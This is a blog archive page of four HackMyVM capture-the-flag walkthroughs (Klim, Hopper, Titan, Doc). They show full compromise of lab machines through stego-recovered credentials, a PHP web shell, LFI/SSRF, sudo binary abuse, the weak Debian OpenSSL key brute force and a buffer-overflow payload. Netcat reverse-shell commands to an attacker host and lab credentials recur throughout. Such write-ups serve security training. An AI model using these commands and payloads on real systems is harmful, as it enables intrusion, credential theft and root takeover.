月度归档:2021年08月

HackMyVm Klim Walkthrough

发表评论

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found wordpress.

```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]


Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-contents/uploads, found an image.

```bash
 ~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
</code></pre>
<p>Found decrypt password, get file dump.</p>
<pre><code class="language-bash"> ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt                                                                                                                                   steghide-0 | 1 [10:35:13]
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)          

 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump</code></pre>
<p>Found login credentials in dump.</p>
<pre><code class="language-bash">~ cat dump|grep pwd
 log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
 ss7WhrrnnHOZC#9bQn
</code></pre>
<p>Login wordpress, in Plugin Editor, modify one php file and add your php shell code into source.</p>
<p>Then get reverse shell.</p>
<pre><code class="language-bash"> ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:57032.
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)</code></pre>
<p>Check sudo -l of www-data.</p>
<pre><code class="language-bash"> www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool</code></pre>
<p>Decompile tool, read the source code. It actually does "cat argv[1]".</p>
<p>```c
int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
{
size_t v3; // rbx
size_t v4; // rax
char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
char *dest; // [rsp+20h] [rbp-20h]
size_t size; // [rsp+28h] [rbp-18h]</p>
<p>strcpy(s, "cat ");
v3 = strlen(s);
size = v3 + strlen(argv[1]) + 1;
dest = (char *)malloc(size);
strncpy(dest, s, size);
v4 = strlen(s);
strncat(dest, argv[1], size - v4);
system(dest);
return 0;
}</p>
<pre><code>
Get ssh key of user klim.

```bash
 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
 ...
 jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
 Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
 49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
 -----END OPENSSH PRIVATE KEY-----
 www-data@klim:/home/klim$

Login ssh as klim.

~ ssh klim@192.168.56.100 -i id_rsa
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found id_rsa.pub in /opt, following author's hint, use openssl

```bash
~ searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...


Following the steps in poc.

  ```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
  tar -jxvf 5622.tar.bz2
  python 5720.py rsa/2048 192.168.56.100 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec

 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100

 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec

Get root login.

```bash
~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim

HackMyVm Hopper Walkthrough

发表评论

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.00079s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
 |   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
 |_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]


Check /advanced-search, input anything and click "Submit", notice the url became "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz if there is LFI.

 ```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.
 txt                                                                                                    
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
 000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
 000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"                                    
 ...
 000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
 000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
 000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
 000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"

Get username through passwd.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash


Make a python script to enum local port.

 ```python
#!/usr/bin/python3
 import requests

 for port in range(1,65535):
     res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
     if len(res.text) == 0:
         continue
     else:
         print(f'port {port} is open.')

Port 2222 is open.

```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.


Check port 2222.

 ```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'    
 <!DOCTYPE html>
 <html>
 <body>

 <h1>[+] WARNING</h1>

 <p> - Private corporative web server</p>

 <p> - If you are non organization personal, leave immediately</p>

 </body>
 </html>

Fuzz dirs of port 2222.

```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'; -t 50 -w /usr/share/dirbuster/wordlists/directory-lis
t-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181

/backup (Status: 200) [Size: 1751]
...


Get a id_rsa key at /backup. Chmod 600. Burteforce the key of id_rsa.

 ```bash
~ /usr/share/john/ssh2john.py id_rsa  > hash.txt  
 & kali @ mykali in ~/Documents/hopper 0 [13:03:29]
 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                         ...
 barcelona        (id_rsa)

Login ssh with user name edward.

 ~ ssh edward@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/edward/.Xauthority does not exist
 edward@hopper:~$ id
 uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload a reverse shell php and get shell as www-data.

 ~ curl http://192.168.56.100/r.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/hopper 0 [13:07:35]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:35698.
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo -l.

```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
(henry) NOPASSWD: /usr/bin/watch


Set the term environment variable, and escalate to user henry.

```bash
 www-data@hopper:/$ export TERM=xterm-256color
 export TERM=xterm-256color
 www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 $ id
 id
 uid=1001(henry) gid=1001(henry) groups=1001(henry)</code></pre>
<p>Upload id_rsa.pub to /home/henry/.ssh/, change name to authorized_keys, and get ssh login as user henry.</p>
<pre><code class="language-bash">~ ssh henry@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/henry/.Xauthority does not exist
 henry@hopper:~$ id
 uid=1001(henry) gid=1001(henry) grupos=1001(henry)</code></pre>
<p>Check sudo -l.</p>
<pre><code class="language-bash"> henry@hopper:~$ sudo -l
 Matching Defaults entries for henry on hopper:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User henry may run the following commands on hopper:
     (root) NOPASSWD: /usr/bin/ascii-xfr</code></pre>
<p>Use ascii-xfr to create a authorzied_keys of root.</p>
<p>```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"</p>
<p>0.6 Kbytes transferred at 565 CPS... Done.</p>
<pre><code>
Login as root.

```bash
 ~ ssh root@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /root/.Xauthority does not exist
 root@hopper:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 hopper

HackMyVm Titan Walkthrough

发表评论

HackMyVm Titan Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Titan

Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for chronos.local (192.168.56.100)
 Host is up (0.00098s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 37:fa:d2:9f:20:25:cf:c5:96:7a:dc:f3:ff:2c:7a:22 (RSA)
 |   256 11:ad:fa:95:71:c5:f9:d4:97:da:42:03:2b:0f:55:bb (ECDSA)
 |_  256 fa:fb:04:13:93:90:a5:01:53:ba:6c:e9:bf:dc:bf:7e (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80. found /robots.txt, then download athena.txt.

 ~ curl http://192.168.56.100/robots.txt
 gobuster-0 | 0 [14:29:34]
 /athena.txt

 ~ wget http://192.168.56.100/athena.txt

Use vim to open athena.txt, found some strange spaces and tabs.

image-20210829143154657.png

Through google "space tab steg", we know it's some crypto strings. And we can decrypt it with stegsnow. Then we get username and password of prometheus.

 ~ sudo apt install stegsnow
 stegsnow is already the newest version (20130616-6).
 ~ stegsnow -C athena.txt
 prometheus/iloveallhumans⏎

Log in ssh as prometheus, found a file named sacrifice in home folder.

 prometheus@titan:~$ ls -la
 total 52
 drwxr-xr-x 2 prometheus prometheus  4096 Aug 18 06:03 .
 drwxr-xr-x 5 root       root        4096 Aug  9 14:23 ..
 -rw------- 1 prometheus prometheus  2718 Aug 18 05:01 .bash_history
 -rw-r--r-- 1 prometheus prometheus   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 prometheus prometheus  3526 Aug  9 14:23 .bashrc
 -rw-r--r-- 1 prometheus prometheus   807 Aug  9 14:23 .profile
 -rwsr-sr-x 1 root       prometheus 16896 Aug  9 14:29 sacrifice
 -rw------- 1 prometheus prometheus   102 Aug 18 05:51 .Xauthority

Disassemble sacrifice, we can know, if we input "beef", we can escalate to user with uid 1000 (0x03E8).

 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   char s1[72]; // [rsp+10h] [rbp-50h] BYREF
   int v6; // [rsp+5Ch] [rbp-4h]

   v6 = 1000;
   printf("What is your offer to the gods?");
   gets(s1);
   if ( strcmp(s1, "beef") )
   {
     printf("Thanks, mortal.");
   }
   else
   {
     setuid(0x3E8u);
     setgid(0x3E8u);
     printf("Take this gift.");
     system("/bin/bash");
   }
   return 0;
 }

Now we can escalate to user zeus.

 prometheus@titan:~$ ./sacrifice
 What is your offer to the gods?beef
 zeus@titan:~$ id
 uid=1000(zeus) gid=1001(prometheus) groups=1001(prometheus)

Check sudo -l.

zeus@titan:~$ sudo -l
 Matching Defaults entries for zeus on titan:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User zeus may run the following commands on titan:
     (hesiod) NOPASSWD: /usr/bin/ptx

Check help manual of ptx, then we can use ptx to read /home/hesiod/.ssh/id_rsa.

```bash
zeus@titan:/home/zeus$ sudo -u hesiod ptx /home/hesiod/.ssh/id_rsa -A -G
.xx "PRIVATE/" "" "-----BEGIN OPENSSH" "" "/home/hesiod/.ssh/id_rsa:1"
.xx "PRIVATE/" "" "-----END OPENSSH" "" "/home/hesiod/.ssh/id_rsa:27"
.xx "" "" "/JT+LbNag1ZqqNu02YET846I1xppdx/gYK5/hW19Shrw0F+V+G2U0AaVxfgFb+B2Sz+QER" "" "/home/hesiod/.ssh/id_rsa:16"
...
.xx "" "" "xUBZ868cu5Flrby84V8UpiXE+tPyq5bZUw24nlJTURFzqy0LkAcAtKQVihXaaoAlOJvz7z" "" "/home/hesiod/.ssh/id_rsa:22"
.xx "" "" "xqQSsiROLKN/zVEXAAAADGhlc2lvZEB0aXRhbgECAwQFBg==" "" "/home/hesiod/.ssh/id_rsa:26"


Paste line by line in order into a new key file, chmod 600, then we can login as hesiod with private key.

```bash
 ~ ssh hesiod@192.168.56.100 -i id_rsa                                                                   ...
 Last login: Wed Aug 18 05:51:27 2021 from 192.168.56.150
 hesiod@titan:~$ id
 uid=1002(hesiod) gid=1002(hesiod) groups=1002(hesiod)
 hesiod@titan:~$</code></pre>
<p>In /home/hesiod, we found a file named fire. It's writable.</p>
<pre><code class="language-bash">hesiod@titan:~$ ls -la
 total 56
 drwxr-xr-x 4 hesiod hesiod  4096 Aug 18 02:11 .
 drwxr-xr-x 5 root   root    4096 Aug  9 14:23 ..
 -rw------- 1 hesiod hesiod  1265 Aug 18 01:51 .bash_history
 -rw-r--r-- 1 hesiod hesiod   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 hesiod hesiod  3526 Aug  9 14:23 .bashrc
 -rwxr-x--- 1 hesiod hesiod 16608 Aug  9 14:27 fire
 drwxr-xr-x 3 hesiod hesiod  4096 Aug  9 14:25 .local
 -rw-r--r-- 1 hesiod hesiod   807 Aug  9 14:23 .profile
 drwx------ 2 hesiod hesiod  4096 Aug  9 14:31 .ssh
 -rw------- 1 hesiod hesiod   102 Aug 18 02:11 .Xauthority</code></pre>
<p>Now here is the key point to root.</p>
<p>Go back to sacrifice, in disassembler, just scroll up a little, we can found a secret function named "thief".</p>
<p>```bash
.text:0000000000001185                 public thief
.text:0000000000001185 thief           proc near
.text:0000000000001185 ; <strong>unwind {
.text:0000000000001185                 push    rbp
.text:0000000000001186                 mov     rbp, rsp
.text:0000000000001189                 mov     edi, 0          ; uid
.text:000000000000118E                 call    _setuid
.text:0000000000001193                 mov     edi, 0          ; gid
.text:0000000000001198                 call    _setgid
.text:000000000000119D                 lea     rdi, command    ; "/home/hesiod/fire"
.text:00000000000011A4                 call    _system
.text:00000000000011A9                 nop
.text:00000000000011AA                 pop     rbp
.text:00000000000011AB                 retn
.text:00000000000011AB ; } // starts at 1185
.text:00000000000011AB thief           endp
.text:00000000000011AB
.text:00000000000011AC
.text:00000000000011AC ; =============== S U B R O U T I N E =======================================
.text:00000000000011AC
.text:00000000000011AC ; Attributes: bp-based frame
.text:00000000000011AC
.text:00000000000011AC ; int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
.text:00000000000011AC                 public main
.text:00000000000011AC main            proc near               ; DATA XREF: _start+1D↑o
.text:00000000000011AC
.text:00000000000011AC var_60          = qword ptr -60h
.text:00000000000011AC var_54          = dword ptr -54h
.text:00000000000011AC s1              = byte ptr -50h
.text:00000000000011AC var_8           = dword ptr -8
.text:00000000000011AC var_4           = dword ptr -4
.text:00000000000011AC
.text:00000000000011AC ; </strong>unwind {
.text:00000000000011AC                 push    rbp
.text:00000000000011AD                 mov     rbp, rsp
.text:00000000000011B0                 sub     rsp, 60h
.text:00000000000011B4                 mov     [rbp+var_54], edi
.text:00000000000011B7                 mov     [rbp+var_60], rsi</p>
<pre><code>
Through reading the source code, we get the final method:

We need to overflow sacrifice, then run secret function "thief", "thief" then calls /home/hesiod/fire, and write shellcode in fire to get root.

To successfully pwn sacrifice, first step is to calcute the offset of overflow point. Download sacrificeto local machine, and use gdb-peda to load it. 

Create pattern string with length 200.

```bash
 gdb-peda$ pattern create 200
 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Input 'r' to let program run, when ask for input answer, paste the above pattern string.

 gdb-peda$ r
 Starting program: /home/kali/Documents/titan/sacrifice
 What is your offer to the gods?AAA%AAsA...

Then we will get Segmentation fault, because return address is illegal.

Program received signal SIGSEGV, Segmentation fault.
 [----------------------------------registers-----------------------------------]
 ...
 RSP: 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 RIP: 0x55555555524a (<main+158>:        ret)
 ...
 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
 [-------------------------------------code-------------------------------------]
    0x55555555523f <main+147>:   call   0x555555555040 <printf@plt>
    0x555555555244 <main+152>:   mov    eax,0x0
    0x555555555249 <main+157>:   leave  
 => 0x55555555524a <main+158>:   ret    
    0x55555555524b:      nop    DWORD PTR [rax+rax*1+0x0]
    0x555555555250 <__libc_csu_init>:    push   r15
    0x555555555252 <__libc_csu_init+2>:  mov    r15,rdx
    0x555555555255 <__libc_csu_init+5>:  push   r14
 [------------------------------------stack-------------------------------------]
 0000| 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 0008| 0x7fffffffe4f0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 ...
 [------------------------------------------------------------------------------]
 Legend: code, data, rodata, value
 Stopped reason: SIGSEGV
 0x000055555555524a in main ()

Use "patter search" to get the offset is 88 for [RSP]. And [RSP] points to the original return address, which we want to overflow with our own return address.

 gdb-peda$ pattern search
 Registers contain pattern buffer:
 RBP+0 found at offset: 80
 Registers point to pattern buffer:
 [RSP] --> offset 88 - size ~112
 [R8] --> offset 0 - size ~212
 ...

The method is, we need to fill 87 chars, then following the address of secret function "thief", which is 0x555555555185. (Maybe not the same on your machine).

```bash
gdb-peda$ disassemble 0x555555555185
Dump of assembler code for function thief:
0x0000555555555185 <+0>: push rbp
0x0000555555555186 <+1>: mov rbp,rsp
0x0000555555555189 <+4>: mov edi,0x0
0x000055555555518e <+9>: call 0x555555555080 <setuid@plt>
0x0000555555555193 <+14>: mov edi,0x0
0x0000555555555198 <+19>: call 0x555555555070 <setgid@plt>
0x000055555555519d <+24>: lea rdi,[rip+0xe64] # 0x555555556008
0x00005555555551a4 <+31>: call 0x555555555030 <system@plt>
0x00005555555551a9 <+36>: nop
0x00005555555551aa <+37>: pop rbp
0x00005555555551ab <+38>: ret
End of assembler dump.


Because intel machine is little-Endian, so the 64bit address of 0x555555555185 should be <code>"\x85\x51\x55\x55\x55\x55\x00\x00" in python string format.

We write reverse shell code in /home/hesiod/fire as user hesiod, remember to add +x in order to let prometheus has execute permission.

```bash
 hesiod@titan:~$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > fire
 hesiod@titan:~$ chmod +x fire
 hesiod@titan:~$ ls -la fire
 -rwxr-x--x 1 hesiod hesiod 36 Aug 18 06:05 fire

Then back to user prometheus, use python to generate the evil string and pwn sacrifice.

 prometheus@titan:~$ python3 -c 'print("a"*87+"\x85\x51\x55\x55\x55\x55\x00\x00")' |./sacrifice
 ────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:47256.
 id
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 cd /root
 id;hostname
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 titan

HackMyVm Doc Walkthrough

发表评论

HackMyVm Doc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Doc

Scan ports, only port 80 is open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bah.hmv (192.168.56.100)
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Check port 80, it's Online Traffic Offense Management System. Google the exploit, and add doc.hmv to /etc/hosts.

https://www.exploit-db.com/exploits/50221

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Use the POC to get user shell.

```bash
~ (p2) python 50221.py
Example: http://example.com
Url: http://doc.hmv
Check Url ...
[+] Bypass Login
[+] Upload Shell
[+] Exploit Done!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Because this shell is not full functional, we spawn another reverse shell.

```bash
 $ nc 192.168.56.150 1234 -e /bin/bash
 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:44802.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Found the password for user bella.

www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 <?php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");
 ?>

Escalate to user bella.

```bash
www-data@doc:~/html/traffic_offense$ su bella
su bella
Password: be114yTU

bella@doc:/var/www/html/traffic_offense$ id
id
uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bella@doc:/var/www/html/traffic_offense$


Check local port, port 21 is actually ssh, so we portforword it outside.

 ```bash
bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
 LISTEN 0      511          0.0.0.0:80        0.0.0.0:*          
 LISTEN 0      128        127.0.0.1:21        0.0.0.0:*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 [1] 571

Check sudo -l.

```bash
bella@doc:~$ sudo -l
Matching Defaults entries for bella on doc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bella may run the following commands on doc:
(ALL : ALL) NOPASSWD: /usr/bin/doc


Disassemble doc, we know it's actually pydoc3.9.

 ```bash
; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
